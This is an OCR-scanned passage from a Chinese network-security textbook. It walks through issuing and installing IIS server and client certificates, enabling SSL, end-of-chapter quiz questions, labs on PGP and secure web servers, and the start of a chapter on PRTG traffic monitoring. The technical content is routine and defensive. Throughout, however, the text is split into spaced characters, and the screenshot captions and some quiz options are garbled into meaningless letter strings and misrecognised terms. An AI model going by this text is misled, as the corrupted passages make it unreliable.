发 送 回 一 个 包含 新 证 书 的 响应 文件 ,重新 启动 此 向 导 , 就 可 实现 将 新 证 书 附加 到 Web 服务 
器 中 。 

(1) 提交 证 书 申请 请 求 

依次 选择 Windows 的 “开始 ”>“ 所 有 程序 ”>“ 管 理工 具 ” 一 “证 书 颁发 机 构 ” 选 项 ,打开 
证 书 颁 发 机 构 管理 器 ,如 图 6. 82 所 示 。 

Hih cqtbi_ca, 在 弹出 的 菜单 中 依次 选择 “所 有 任务 ”一 “提交 一 个 新 的 申请 ”选项 ,如 
图 6. 83 所 示 。 

此 时 将 显示 “打开 申请 文件 ”对 话 框 ,选择 前 一 步 产 生 的 请 求 文 件 c:\certreq. txt, 即 可 
将 服务 器 证 书 申请 请 求 提交 给 证 书 颁发 机 构 。 接 下 来 选择 “ 挂 起 的 申请 ”文件 , 即 可 查看 提 
交 到 证 书 颁发 机 构 的 请 求 ,如 图 6. 84 所 示 。 
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图 6.82 证 书 颁发 机 构 管理 器 
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图 6.83 提交 证 书 申请 请 求 
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图 6.84 收 到 的 待 处 理 的 证 书 申请 请 求 


(2) 颁发 证 书 
在 如 图 6. 84 所 示 的 界面 中 ,在 证 书 申请 请 求 项 目 上 右 击 ,在 弹出 的 菜单 中 依次 选择 “所 
有 任务 ”一 “颁发 "选项 , 即 可 实现 对 该 证 书 申请 的 颁发 ,如 图 6.85 所 示 。 
GESS] 
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=ar pege 


图 6.85 颁发 证 书 
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C 类 由 的 申请 
到 


图 6.86 已 颁发 的 证 书 


(3) 将 证 书 导出 到 证 书 文件 
在 如 图 6. 86 所 示 的 界面 中 ,在 颁发 的 证 书 列表 中 要 导出 的 证 书 上 右 击 ,在 弹出 的 菜单 


中 选择 “打开 ”菜单 项 ,打开 证 书 ,然后 选择 “详细 信息 ”选项 卡 ,如 图 6.87 所 示 。 
在 如 图 6.87 所 示 的 对 话 框 中 , 单 击 “ 复 制 到 文件 "按钮 ,将 打开 证 书 导 出 向 导 。 在 欢迎 
界面 中 直接 单 击 “ 下 一 步 "按钮 . 接 下 来 将 显示 证 书 “ 导 出 文件 格式 ”对 话 框 ,如 图 6. 88 所 示 。 
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图 6. 87 证书 详细 信息 图 6. 88 选择 证 书 导出 的 格式 


保持 默认 的 DER 编码 二 进 制 X. 509 格式 ,然后 单 击 * 下 一 步 ?按钮 , 接 下 来 设置 指定 导 
出 文件 名 及 路 径 , 单 击 “ 浏 览 " 按 钮 ,将 打开 “另存 为 ”对话 框 ,在 该 对 话 框 中 可 选择 文件 的 存 
盘 路 径 ,并 可 指定 存盘 的 文件 名 ,证 书 文件 的 扩展 名 为 . cer。 此 处 假设 将 证 书 导出 到 c:\ 
cqtbi_web. cer 文件 中 ,文件 名 设置 好 后 , 单 击 “ 下 一 步 " 按 钮 ,在 “正在 完成 证 书 导出 向 导 ” 对 
话 框 中 单 击 “ 完 成 "按钮 ,完成 证 书 的 导出 并 结束 导出 向 导 。 


3. 安装 Web 服务 器 证 书 
在 1S 中 打开 网 站 的 属性 对 话 框 ,选择 “目录 安全 性 ”选项 卡 , 单 击 “ 服 务 器 证 书 ” 按 钮 ， 


再 次 打开 服务 器 证 书 向 导 , 此 时 向 导 会 提示 存在 挂 起 的 证 书 请 求 , 如 图 6. 89 所 示 。 
单 击 “ 下 一 步 ” 按 钮 ,此 时 将 打开 如 图 6. 90 所 示 的 对 话 框 。 选 中 “处 理 挂 起 的 请 求 并 安 
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文件 名 及 路 径 的 对 话 框 , 单 击 “ 浏 览 ” 按 钮 ,选择 前 面 导 出 的 服务 器 证 书 文件 ,如 图 6. 91 
所 示 。 


到 
欢迎 使 用 Web 服务 器 证 书 向 导 


此 向 导 樟 玫 助 您 他 陵 并 首 理 服务 器 证 书 , TURAR 
EMS EM Teb 通 


Yeb 服务 器 状态 : 


存在 挂 起 的 证 书 清 求 。 证 书 向 导 梅 帮助 您 处 理 证 书 颁 
发 机 构 的 啊 应 或 前 此 挂 起 的 请 求 。 


单 击 “ 下 一 步 ”按钮 继续 。 


SEs oD _ wa 


图 6.89 Web 服务 器 证 书 向 导 


us iF Fi S: 


挂 起 的 证 书 请 求 
挂 起 的 证 书 请 求 是 指证 书 颁发 机 构 尚未 啊 应 的 请 求 。 


存在 挂 起 的 证 书 请 求 ， 如 何 处 理 ? 
C MERRER O 


《上 一 步 @) 职 消 


图 6.90 对 挂 起 的 证 书 请 求 选择 操作 


us iÉ Fi S 


处 理 挂 起 的 请 录 
通过 检索 包 合 证 书 湛 发 机 构 响 应 的 文件 来 处 理 挂 起 的 证 书 请 求 。 


输入 包 合 证 书 磊 发 机 构 响 应 的 文件 的 路 径 和 名 称 。 
路 径 和 文件 名 D: 


[i \catbi_web. cer AED. 


<te own] ma 


图 6.91 选择 服务 器 证 书 文件 
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在 如 图 6.91 所 示 的 对 话 框 中 , 单 击 “下 一 步 " 按 钮 ,此 时 将 打开 设置 指定 SSL 端口 号 的 
对 话 框 。 保 持 默认 的 443 号 端口 不 变 , 直 接 单 击 “ 下 一 步 ”按钮 ,在 接 下 来 的 对 话 框 中 将 显示 
将 要 安装 的 证 书 的 详细 信息 ,确认 无 误 后 , 单 击 * 下 一 步 "按钮 ,最 后 在 完成 Web 服务 器 证 书 
向 导 对 话 框 中 单 击 “完成 ”按钮 ,完成 服务 器 证 书 的 安装 。 

服务 器 证 书 安装 成 功 后 ,如 图 6. 74 所 示 界 面 中 的 “查看 证 书 ” 按 钮 变 为 有 效 。 单 击 该 按 
钮 ,可 查看 已 安装 到 Web 服务 器 的 证 书 的 相关 信息 ,如 图 6. 92 所 示 。 

4. 配置 IIS, 启 用 安全 通道 

Web 服务 器 安装 证 书后 ,还 必须 设置 启用 安全 通道 (SSL), 使 网 站 采用 https:// 协 议 进 
行 访问 。 

在 如 图 6.74 所 示 的 设置 界面 中 ,在 安全 通信 组 中 单 击 “ 编 辑 " 按 钮 ,打开 “安全 通信 ”对 话 
框 , 勾 选 “ 要 求 安 全 通道 (SSL)” 选 项 ,如 图 6.93 所 示 ,然后 单 击 “ 确 定 ” 按 钮 完成 设置 修改 。 


EE 
DRE eman Esee l 


证 书信 息 


这 个 证 书 的 目的 如 下 - 
* 保证 远程 计算 机 的 身份 


有 效 起 始 日 期 2010-11-22 到 2011-11-22 
P 您 有 一 个 与 该 证书 对 应 的 徐 钼 。 smao: | —_— 
TERRIG KADA iy 
[se jJ ma | www 


图 6.92 查看 Web 服务 器 已 安装 的 证 书 的 图 6.93 启用 安全 通道 
相关 信息 


5. 访问 测试 

经 过 以 上 配置 后 , Web 服务 器 就 支持 SSL 安全 通信 了 ,此 时 访问 网 站 时 ,应 采用 
https:// 取 代 http:// 协 议 来 进行 。 对 于 本 例 的 测试 网 站 ,其 访问 地 址 为 https://www. 
myweb. com, 运 行 后 的 正 浏览 器 界面 如 图 6.94 所 示 。 


Ahttps://www.myweb.com/ - Windows Internet Explorer 
TORE meson ae] 
文件 (E) SRO FEV BERW IAD HMHW 

RRR Q@hetps:Jlewew.myweb.con/ 


图 6.94 采用 https:// 协 议 访问 的 网 站 
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本 测试 网 站 的 首页 为 用 户 登录 界面 ,使 用 https:// 协 议 访问 成 功 ,而 且 在 TE 浏览 器 地 
址 输入 框 右 侧 显 示 了 | 量 | 图 标 , 说 明 网 站 安装 配置 服务 器 证 书 成 功 。 客 户 端 与 服务 器 端的 
链 路 通道 采用 SSL 协议 进行 加 密 传输 ,有 效 保证 了 网 页 传输 的 数据 的 安全 。 对 于 IE6 浏览 
器 ,加 锁 图 标 显示 在 浏览 器 底部 的 状态 栏 中 。 

IE 浏 览 器 地 址 输入 框 右 侧 的 [ 量 | 图 标 暗示 本 网 站 采用 加 密 传输 ,网 页 访问 和 传输 是 安 
全 的 。 

以 后 网 站 域名 若 发 生 改 变 , 则 原 安 装 的 服务 器 证 书 对 于 新 的 网 站 域名 是 无 效 的 ,访问 时 
将 提示 网 站 的 安全 证 书 有 问题 ,此 时 必须 重新 申请 和 安装 配置 服务 器 证 书 。 为 证 明 这 一 点 ， 
现在 DNS 服务 器 中 添加 了 对 chat. myweb. com 域名 的 解析 ,将 该 域名 解析 出 的 IP 地 址 ,也 
设置 为 该 Web 服务 器 的 IP 地 址 ,然后 在 IE 浏览 器 中 使 用 https://chat. myweb. com 进行 
访问 ,此 时 就 会 报告 此 网 站 的 安全 证 书 有 问题 "的 错误 提示 ,如 图 6. 95 所 示 。 这 种 错误 是 
由 于 网 站 域名 与 服务 器 证 书 中 的 域名 信息 不 匹配 所 造成 的 ,因此 ,在 申请 服务 器 证 书 时 ,在 
设置 指定 网 站 的 公用 名 称 时 ,一定 要 设置 成 网 站 正式 运行 的 域名 。 

在 如 图 6.95 所 示 的 界面 中 , 单 击 * 继 续 浏览 此 网 站 (不 推荐 ) "按钮 ,可 忽略 证 书 错误 , 强 
行 访问 该 网 站 ,网 站 也 能 正常 访问 ,但 IE 地 址 栏 的 背景 色 会 变 为 粉红 色 ,地址 栏 右 侧 还 会 显 
示 “ 证 书 错误 ”的 提示 信息 ,以 提示 用 户 证 书 不 匹配 ,如 图 6. 96 所 示 。 


证 书 错误: 导航 已 阻止 - windows Internet Explorer 


Os [E roi mweba z] |x 
文件 (E) ”编辑 (E) EEV RERA IMD WR) 
TRER 。 @urtitiR: SELEFB ir 


Q 此 网 站 的 安全 证 书 有 问题 。 


此 网 站 出 具 的 安全 证 书 是 为 其 他 网 站 地 址 颂 发 的 。 

安全 证 忆 问 题 可 能 显示 试图 其 恕 您 或 截获 您 向 服务 器 发 送 的 数据 。 
建议 关闭 此 网 页 ， 并 且 不 要 继续 浏览 该 网 站 。 

O 单 击 此 处 关闭 该 网 页 . 

O 继续 浏览 此 网 站 (下 推荐 ). 

© 更 多 信息 


图 6.95 证 书 错误 提示 信息 


lolx 
Go- a esl on asma |o x| 
x GHO SEV KERO IAD EBW 
ERER (É https: lichat.myweb, com] 


图 6.96 强行 访问 证 书 不 匹配 的 网 站 
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网 站 设置 启用 了 “要 求 安 全 通道 (SSL)" 后 ,就 只 能 采用 https:// 协 议 进行 访问 ,不 能 再 
用 传统 的 http:// 协 议 来 访问 了 ,此 时 车 仍 采 用 http://www. myweb. com 来 访问 ,IE 浏览 
器 会 提示 必须 通过 安全 通道 来 访问 ,如 图 6. 97 所 示 。 


该 页 必须 通过 安全 通道 查看 


您 添 图 沪 问 的 页 面 使 用 安全 套 接 字 层 CSL) 进行 保护 。 


请 将 试 以 下 操作 : 
， 在 悠 要 访问 的 地 址 前 键入 https:// 并 按 Enver. 


HTTP 188 403.4 - 禁止 访问 : 需要 使 用 SSL 查看 该 资源 。 
Internet 信息 服务 OIS) 


图 6.97 使 用 http:// 协 议 访问 启用 了 安全 通道 的 网 站 


6.4.4 客户 端 证 书 的 申请 与 安装 


1. 客户 端 证 书简 介 

客户 端 证 书 用 于 识别 当前 用 户 是 否 为 网 站 资源 的 合法 访问 用 户 , 并 可 使 用 证 书 来 进行 
数字 签名 和 加 解密 数据 。 通 过 在 HS 中 设置 要 求 客 户 端 证 书 , 如 图 6.98 所 示 , 可 实现 只 多 
许 拥有 服务 器 能 识别 的 客户 端 证 书 的 用 户 才能 访问 ,没有 合法 客户 端 证 书 的 用 户 就 不 能 访 
问 网 站 资源 。 


图 6.98 设置 要 求 客户 端 证 书 


默认 情况 下 ,对 客户 端 证 书 的 设置 是 "忽略 客户 端 证 书 ”。 如 果 网 站 资源 是 对 用 户 公开 
的 ,大 家 都 允许 访问 , 则 客户 端 证 书 可 设置 为 “忽略 客户 端 证 书 ” 或 “接受 客户 端 证 书 ”。 若 网 
站 资源 仅 针对 部 分 合法 用 户 开放 . 则 设置 为 要 求 客户 端 证 书 ”, 然 后 在 这 些 合 法 用 户 的 计算 
机 上 申请 和 安装 客户 端 证 书 。 
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2. 客户 端 证 书 的 申请 

客户 端 证 书 向 CA 证 书 服务 器 申请 。 在 实际 应 用 环境 中 ,CA 证 书 服务 器 是 单独 的 服 
务 器 ,在 本 应 用 示例 中 ,CA 证 书 服务 器 是 与 Web 服务 器 安装 在 同一 台 计算 机 上 的 。 

由 于 本 示例 网 站 在 前 面 的 配置 中 已 启用 安全 通道 ,因此 ,应 采用 https:// 协 议 来 访问 证 
书 申请 页 面 。 在 客户 端的 浏览 器 地 址 栏 中 输入 “https:// 证 书 服务 器 /CertSrv/default. asp” 
网 址 , 即 可 打开 证 书 申请 页 面 。 

对 于 本 示例 ,在 客户 端 浏览 器 中 输入 https://www. myweb. com/ certsrv/default. asp, $T 
开 证 书 申请 页 面 ,如 图 6.99 所 示 。 单 击 “ 申 请 一 个 证 书 ” 链 接 , 将 显示 如 图 6. 100 所 示 的 界 
面 ,在 该 页 面 中 单 击 "Web 浏览 器 证 书 " 链 接 , 接 下 来 将 显示 证 书 识别 信息 输入 页 面 ,如 
图 6.101 所 示 。 


证 书 服务 - windows Internet Explorer 


文件 (E) MKO EEV BERA IAD 帮助 (H) 


ABER — @vwcrosot 证 书 服务 


ek 
£: AW uta FAREREI (CO TER, 证 书 链 ， 或 证 书 吊销 列表 (CRL) ， 或 查看 挂 
有 关 证 书 服务 的 详细 信息 ， 请 参阅 证 书 服务 文档 . 

选择 一 个 任务 : 


查看 村 起 的 证 书 申请 的 状态 
和 CR 


图 6.99 申请 证 书 


Microsoft 证 书 服务 - Windows Internet Explorer 


图 6. 100 选择 证 书 类 型 
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/ Microsoft 证 书 服务 - windows Internet Explorer 
[SP [B] Hetps:jenw.mywsb.comjo: owe Agla] 
Liun SRO SEV KERW IAD BXH) 


Hicrosoft 证 书 服务 一 catbi_ca 
Reb = 


要 完成 您 的 证 书 ， 在 下 面 的 框 中 输入 要 求 的 信息 。 


图 6.101 设置 浏览 器 证 书 识别 信息 


设置 输入 浏览 器 证 书 的 识别 信息 后 , 单 击 “ 提 交 ? 按 钮 ,此 时 将 显示 "此 网 站 正在 代表 您 
请 求 一 个 新 的 证 书 。 您 应 该 只 允许 信任 的 网 站 为 您 请 求证 书 。 您 想 现在 请 求证 书 吗 ?” 的 提 
示 信 息 , 单 击 * 是 ”按钮 确认 提交 ,提交 成 功 后 ,将 显示 如 图 6. 102 所 示 的 对 话 框 。 对 话 框 中 
显示 了 本 次 证 书 申请 的 ID 号 。 接 下 来 只 有 等 待 CA 证 书 服务 器 的 管理 员 颁 发 该 证 书 ,颁发 
后 ,再 用 该 客户 端的 浏览 器 登录 , 才 可 下 载 安装 浏览 器 证 书 。 


您 的 证 书 申请 已 经 收 到 。 但 是 ， 您 必须 等 符 管理 员 颁发 您 申请 的 证 书 。 
您 的 申请 Id 为 3。 

请 在 一 天 或 两 天 内 返回 此 网 站 以 检索 您 的 证 书 。 

注意 : 您 必须 用 此 Veb 浏览 器 在 10 天 内 返回 以 检索 您 的 证 书 


图 6.102 浏览 器 证 书 申请 提交 成 功 


3. 客户 端 证 书 的 颁发 
在 CA 证 书 服务 器 上 打开 “证 书 颁发 机 构 ”, 在 挂 起 的 申请 中 就 可 查看 证 书 申请 请 求 。 
使 用 前 面 介绍 的 方法 ,颁发 客户 端的 浏览 器 证 书 。 
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4. 客户 端 证 书 的 安装 

证 书 颁发 后 ,在 客户 端 浏览 器 中 再 次 访问 https://www. myweb. com/certsrv/ default. 
asp 地 址 ,在 出 现 的 页 面 中 , 单 击 “ 查 看 挂 起 的 证 书 申请 的 状态 "链接 , 接 下 来 显示 的 页 面 如 
图 6.103 所 示 。 


soft 证 书 服务 - windows Internet Explo: 


请 选择 您 要 查看 的 证 书 申请 : 
AASI E 


图 6.103 选择 要 查看 的 证 书 


在 如 图 6. 103 所 示 的 页 面 中 , 单 击 “Web 浏览 器 证 书 (2010 年 11 月 24 日 14:58:41)” 
链接 ,此 时 将 显示 如 图 6. 104 所 示 的 页 面 。 


您 申请 的 证 书 已 颁发 给 您 。 
安装 此 iF 书 


图 6. 104 查看 到 的 证 书 颁 发 状态 


在 如 图 6. 104 所 示 的 页 面 中 , 单 击 “ 安 装 此 证 书 " 链 接 , 在 弹出 的 提示 框 中 单 击 “ 是 ”按钮 
确认 安装 ,最 后 证 书 就 可 安装 成 功 。 

客户 端 浏览 器 证 书 安装 成 功 后 ,在 下 浏览 器 的 “Internet 选项 ”对 话 框 中 选择 内容” 选 
项 卡 ,然后 单 击 “ 证 书 ” 按 钮 , 即 可 查看 到 当前 浏览 器 所 安装 的 个 人 证 书 , 如 图 6. 105 所 示 。 

5. 测试 验证 

客户 端 浏 览 器 证 书 安装 成 功 后 ,在 W eb 网 站 的 安全 通信 设置 界面 中 ,将 客户 端 证 书 的 
设置 修改 为 "要 求 客户 端 证 书 ”, 然 后 在 客户 端 浏 览 器 中 再 次 访问 https://www. myweb. 
com 网 站 ,此 时 就 会 首先 弹出 “选择 数字 证 书 ” 对 话 框 ,如 图 6. 106 所 示 , 选 择 刚才 安装 的 浏 
览 器 证 书 , 单 击 “ 确 定 ” 按 钮 后 ,就 可 正常 访问 到 网 站 了 。 

若 用 户 不 选择 或 没有 合法 的 数字 证 书 , 或 者 在 如 图 6. 106 所 示 的 对 话 框 中 单 击 “取消 ” 
按钮 ,此 时 将 无 法 访问 网 站 ,并 显示 如 图 6. 107 所 示 的 提示 页 面 。 
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Jisan ns => 


[us E E) 

mO: [F E] 

+A | 其 好 人 parnasa] seenen | 受信 任 的 发 行者 | 《| ?| 

nares T 
AG FallAdnin  BG-TALL 2016-93 身份 验证 
ka s; N wmawanumsama. masus. 
nus 

SAW. SHY.. mY SZW. 

证 书 的 预期 目的 - 

客户 喘 验 证 

| = 

图 6.105 已 安装 的 浏览 器 个 人 证 书 图 6.106 选择 浏览 器 数字 证 书 


⁄ ii £ Š - Windows Internet Explorer 

g9 myweb. comi DEVE 
文件 (E) WRO EEV KERA IAD 帮助 (H) 

这 收藏 天 。 逢 该 页 要 求 客户 证 书 


该 页 要 求 客户 证 书 


您 要 访问 的 页 面 要 求 浏览 器 具有 Web 服务 器 可 识别 的 安全 套 接 字 屋 (SL) EPER. 客 
户 证 书 用 来 识别 您 是 否 为 资源 的 合法 用 户 。 


请 辩 试 以 下 拘 作 : 


， 加 果 修 认为 自己 应 该 能 够 不 使 用 客户 证 忆 查 看 该 目录 或 页 面 ， 或 者 您 想 取得 新 的 客 
户 证 书 ,请 与 网 站 管理 员 联 系 。 
， 如 果 您 已 经 拥有 客户 证 书 ,请 使 用 Web 浏览 器 的 安全 功能 来 确保 客户 证 书 的 安装 正 
确 无 误 。( 有 些 vo 浏览 器 可 能 会 村 客户 证 书 视 为 浏览 器 或 个 人 证 书 。》 


HTTP WRR 403.7 - 茜 止 访问 : 需要 SSL EPER. 
Internet 信息 服务 CIS) 


技术 信息 ( 为 技术 支持 人 员 提供 》 


， 转 到 Microsoft. 产品 支持 服务 并 搜索 包括 “HTTP” 和 “403” 的 标题 。 
， 打 开 “IIS 帮助 ”《 可 在 IIS 管理 器 (inetngr) 中 访问 ) ， 然 后 搜索 标题 为 “ 藉 
mai “使 用 证 书信 任 列表 ”、“ 局 用 客 忆 证 蔬 ”和 “关于 自 定义 模 误 消息 ” 


D 
到 


图 6.107 必须 使 用 SSL 客户 证 书 的 提示 


通过 设置 网 站 要 求 客户 端 证 书 , 可 保证 只 有 拥有 合法 数字 证 书 的 客户 端 才能 访问 网 站 。 


习 题 6 


1. 以 下 关于 电子 商务 安全 技术 的 描述 ,不 正确 的 是 ( ) 。 
A. 通过 数据 签名 可 对 数据 发 送 者 进行 身份 鉴别 
B. 数字 摘要 用 于 实现 对 数据 的 完整 性 进行 鉴别 
C. 数字 信封 中 保存 的 内 容 为 发 送 者 的 私 角 
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D. 数字 信封 中 保存 的 内 容 是 对 称 加 密 的 密 钥 
2. 电子 商务 的 安全 要 素 包括 ( 。 )。 


A. 数据 的 机 密 性 B. 数据 的 完整 性 

C. 身份 的 可 鉴别 性 D. 不 可 抵赖 性 
3. 以 下 加 密 算法 中 ,属于 对 称 加 密 算法 的 是 ( Yi: 

A. RSA B. DES C. DSA D. AES 
4. 以 下 加 密 算法 中 ,属于 非 对 称 加 密 算法 的 是 ( Na 

A. RSA B. DES C. DSA D. IDEA 
5. 以 下 算法 中 ,不 能 用 于 生成 数据 摘要 的 是 ( Jy 

A. SHA-1 B. SHA-2 C. MD5 D- RSA 


6. 以 下 关于 数字 摘要 的 描述 ,不 正确 的 是 ( y; 
A. 数字 摘要 算法 是 单 向 的 ,根据 数字 摘要 不 能 反 推出 原文 
B. 数字 摘要 用 于 检验 数据 的 完整 性 
C. 可 使 用 MD5 或 SHA-2 算法 来 生成 数字 摘要 
D. 对 于 同一 个 原文 ,使 用 MD5 算法 或 SHA-2 算法 所 生成 的 数字 摘要 是 相同 的 
7. 以 下 关于 数字 签名 的 描述 ,不 正确 的 是 ( y 
A. 数字 签名 可 用 于 数据 发 送 者 的 身份 校 验 
B. 数字 签名 通常 使 用 RSA 算法 ,并 采用 发 送 者 的 公 钥 加 密 数字 摘要 来 生成 数字 
签名 
C. 数字 签名 采用 发 送 者 的 私 钥 加 密 数 字 摘 要 来 生成 数字 签名 
D. 数字 签名 可 用 于 实现 防 抵赖 行为 
8. 以 下 关于 数字 证 书 和 CA 的 描述 ,不 正确 的 是 ( Xs 
A. 数字 证 书 由 CA BLEJ 
B. 数字 证 书 用 于 保存 用 户 的 公 钥 或 私 钥 信息 
C. 数字 证 书 中 一 定 包 含 用 户 的 私 钥 信 息 
D. 数字 证 书 有 多 种 类 别 , 有 的 只 包含 用 户 的 公 钥 信息 ,有 的 包含 私 钥 信 息 
9. SSL 或 TLS 协议 默认 使 用 的 端口 号 是 ( ) 。 
A. TCP 445 B. TCP 443 C. TCP 1433 D. UDP 443 
10. 以 下 关于 PGP 功能 的 描述 ,不 正确 的 是 ( ) 。 
A. 利用 PGP 可 实现 高 强度 的 加 密 , 支 持 公 钥 加 密 算法 
B. 利用 PGP 可 创建 加 密 的 自 解压 PGP 压缩 包 文件 
C. 利用 PGP 可 实现 在 邮件 收发 时 自动 加 密 或 解密 邮件 
D. PGP 不 能 实现 对 系统 盘 的 完全 加 密 
11. 以 下 关于 安全 Web 服务 器 的 描述 ,不 正确 的 是 ( Ja 
A. 安全 Web 服务 器 默认 使 用 的 端口 为 TCP 443 
B. 安全 Web 服务 器 所 收发 的 数据 全 部 是 加 密 传输 的 ,从 而 保证 了 数据 的 传输 
安全 
. 安全 Web 服务 器 必须 安装 服务 器 端 数字 证 书后 才能 启用 生效 
.安全 Web 服务 器 仍 使 用 http:// 协 议 进 行 访问 


= 
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实 训 6.1 使 用 PGP 加 解密 数据 


【 实 训 目的 】 掌握 利用 PGP 软件 对 数据 进行 加 解密 的 操作 方法 。 

【 实 训 环境 】 计算 机 操作 系统 为 Windows 系统 ,PGP 软件 采用 PGP Desktop10. 0. 2 
纪念 版 。 计 算 机 系统 能 访问 互联 网 ,以 便 进行 邮件 收发 的 加 解密 实 训 。 

【 实 训 内 容 与 步骤 】 

(1) 在 计算 机 系统 中 安装 PGP Desktop10.0. 2 纪念 版 软件 。 安 装 完毕 后 重启 系统 , 根 
Jš PGP 设置 助手 向 导 , 初 始 化 PGP 系统 的 设置 ,并 生成 用 户 的 密 钥 对 。 

(2) 将 用 户 的 公 钥 导出 到 MyPublicKey. ase 文件 中 ,然后 用 记事 本 打开 该 文件 ,查看 用 
户 的 公 钥 信息 。 

(3) 利用 新 建 PGP 密 钥 功 能 ,新 建 一 个 PGP 密 钥 对 ,用 做 后 续 实 训 内 容 所 需 的 数据 接 
收 者 的 密 钥 。 

(4) 利用 PGP 加 解密 文件 。 

O 利用 PGP 压缩 包 功 能 ,自选 一 些 要 加 密 的 文件 ,使 用 接收 者 的 公 钥 对 其 进行 加 密 ， 
生成 myData. pgp 加 密 包 文 件 。 

© 利用 接收 者 的 私 钥 , 对 myData. pgp 压缩 包 进 行 解密 还 原 数据 文件 。 

(5) 利用 PGP 加 密 数据 内 容 。 

(D 将 要 加 密 的 数据 内 容 复制 粘贴 到 记事 本 中 ,使 用 PGP 对 记事 本 中 的 内 容 进 行 加 密 ， 
然后 观察 数据 加 密 后 的 结果 。 

© 使 用 “解密 & 检验 ”功能 ,对 记事 本 中 的 内 容 进行 解密 ,查看 能 否 正 确 解密 还 原 
数据 。 

(6) 对 邮件 收发 实现 自动 加 解密 。 

O 在 “PGP 消息 ”功能 项 中 选择 “新 服务 "选项 ,对 要 进行 邮件 收发 的 邮箱 账户 ,配置 创 
建 一 个 对 应 的 PGP 消息 服务 。 邮 件 接收 者 也 必须 配置 自己 邮箱 的 PGP 消息 服务 。 

© 使 用 Foxmail 邮件 收发 客户 端 软件 ,给 邮件 接收 者 (请 选择 前 面 已 创建 了 PGP 密 钥 
对 的 接收 者 ) 发 送 一 封 测试 邮件 。 发 送 过 程 中 ,观察 屏幕 右 下 角 是 否 弹出 PGP 发 送 邮件 成 
功 的 提示 信息 。 

© 在 邮件 接收 者 主机 接收 邮件 ,或 在 本 地 主机 的 Foxmail 软件 中 ,添加 配置 接收 者 的 
邮箱 ,然后 接收 邮件 ,并 注意 查看 收 到 的 邮件 是 否 已 正常 解密 。 如 果 接 收 者 主机 没有 安装 配 
置 PGP, 则 收 到 的 邮件 内 容 是 加 密 的 ,无 法 解密 。 

(7) 使 用 PGP 虚拟 磁盘 。 

O 在 D:\myDisk 文件 夹 下 创建 一 个 PGP 虚拟 磁盘 文件 (扩展 名 为 . pgd) ,虚拟 磁盘 文 
件 系统 格式 选择 NTFS ,加 密 方式 选择 默认 的 AES(256 位 ) 算 法 。 

© 挂 载 该 虚拟 磁盘 ,然后 复制 一 部 分 文件 到 该 虚拟 磁盘 中 ,观察 该 磁盘 在 使 用 方面 是 
否 与 真实 磁盘 一 样 。 

© 外 载 该 虚拟 磁盘 ,查看 是 否 能 还 存 取 访 问 到 虚拟 磁盘 中 的 数据 。 
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实 训 6.2 配置 使 用 安全 Web 服务 器 


【 实 训 目的 】 掌握 安全 Web 服务 器 的 用 途 .配置 和 使 用 方法 。 

【 实 训 环境 】 安装 有 Windows 2003 Server 的 计算 机 一 台 , 测 试用 的 客户 机 一 台 。 若 
没有 多 余 的 测试 用 机 ,测试 机 与 Windows 2003 Server 服务 器 可 由 同一 台 计 算 机 兼任 。 

Windows 2003 Server 安装 光盘 一 张 。 

【 实 训 内 容 与 步骤 】 

(1) 首先 检查 Windows 2003 Server 是 否 安装 HS 服务 组 件 , 若 没有 安装 , 则 安装 IS, 
注意 安装 Web 服务 和 对 ASP 解析 的 支持 。 

(2) 检查 Windows 2003 Server 是 否 安装 了 证 书 服务 , 若 没有 , 则 安装 证 书 服务 组 件 。 

(3) 申请 和 安装 Web 服务 器 证 书 。 

D 为 Web 服务 器 申请 Web 服务 器 证 书 。 

© 打开 证 书 颁发 机 构 管理 器 ,提交 证 书 申请 请 求 , 并 颁发 证 书 , 然 后 导出 服务 器 证 书 。 

@ 在 Web 服务 器 上 安装 Web 服务 器 证 书 。 

(4) 配置 IIS, 启 用 安全 通道 (SSL)。 

(5) 配置 Web 网 站 ,并 编写 或 上 传 一 个 测试 用 的 网 页 ,然后 在 客户 机 上 分 别 采用 
http:// 协 议和 https:// 协 议 访问 该 站 点 ,查看 这 两 种 访问 方式 的 访问 结果 是 否 有 差异 ,并 
思考 为 什么 会 有 这 种 差异 。 

(6) 在 IIS“ 安全 通信 ?设置 对 话 框 中 ,对 客户 端 证 书 设置 为 "要求 客 户 端 证 书 ”, 然 后 再 
使 用 https:// 协 议 访问 该 网 站 ,查看 是 否 还 能 正常 访问 到 该 网 站 ,并 思考 为 什么 会 这 样 。 

(7) 申请 并 安装 配置 客户 端 证 书 ,然后 再 使 用 https:// 访 问 该 网 站 ,查看 是 否 能 正常 访 
问 到 该 网 站 。 
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除了 对 计算 机 通信 子 网 ,用 户主 机 和 服务 器 进行 安全 设置 和 防范 之 外 ,对 计算 机 网 络 进 
行 安全 监控 和 安全 管理 也 是 至 关 重 要 和 必要 的 。 本 章 主 要 介绍 对 网 络 流量 的 实时 监控 方 
法 、 网 络 报 文 的 捕 包 分 析 和 网 络 所 传递 内 容 的 实时 监控 审核 。 


7.1 网 络 流量 监控 


通过 安装 和 使 用 网 络 流量 监控 设备 ,可 对 网 络 各 接口 的 流量 进行 实时 监控 ,以 及 时 发 现 
网 络 流量 的 异常 情况 ,有 助 于 发 现 和 解决 网 络 运营 过 程 中 出 现 的 突 发 问题 ,以 保障 网 络 的 正 
常 稳定 运行 。 

网 络 流量 监控 可 使 用 专用 硬件 设备 来 实现 ,也 可 采用 PC 通过 安装 网 络 流量 监控 软件 
来 实现 。 常 用 的 网 络 流量 监控 软件 主要 有 PRTG 和 MRTG. 


7.1.1 使 用 PRTG 进行 流量 监控 


PRTG(Paessler Router Traffic Grapher) 是 一 款 可 在 Windows 平 台 上 运行 的 网 络 流 量 
监控 软件 。 能 通过 SNMP 协议 与 被 监控 设备 进行 通信 ,取得 设备 的 流量 信息 并 生成 流量 
图 或 图 形 报表 ,并 可 通过 Web 页 面 来 实时 呈现 流量 图 ,以 方便 管理 员 对 网 络 流量 的 实时 
监控 。 

PRTG 的 官方 下 载 网 址 为 http://www. paessler. com/prtg/download, 目 前 最 新 版 本 
为 8.1.2.1809。 版 本 类 型 分 为 免费 版 ,测试 版 和 商用 版 ,不 同 版 本 在 使 用 授权 时 间 和 支持 
的 Sensor( 传 感 器 ) 数 量 方面 有 区 别 。 免 费 版 可 免费 使 用 .但 只 支持 10 个 Sensor, 只 能 同时 
对 10 个 网 络 端口 的 流量 进行 监控 。 下 面 以 6. 0. 5. 451 Commercial Edition 版 为 例 , 介 绍 
PRTG 的 安装 和 使 用 方法 ,该 版 本 可 支持 500 个 Sensor。 

1. 安装 SNMP 协议 

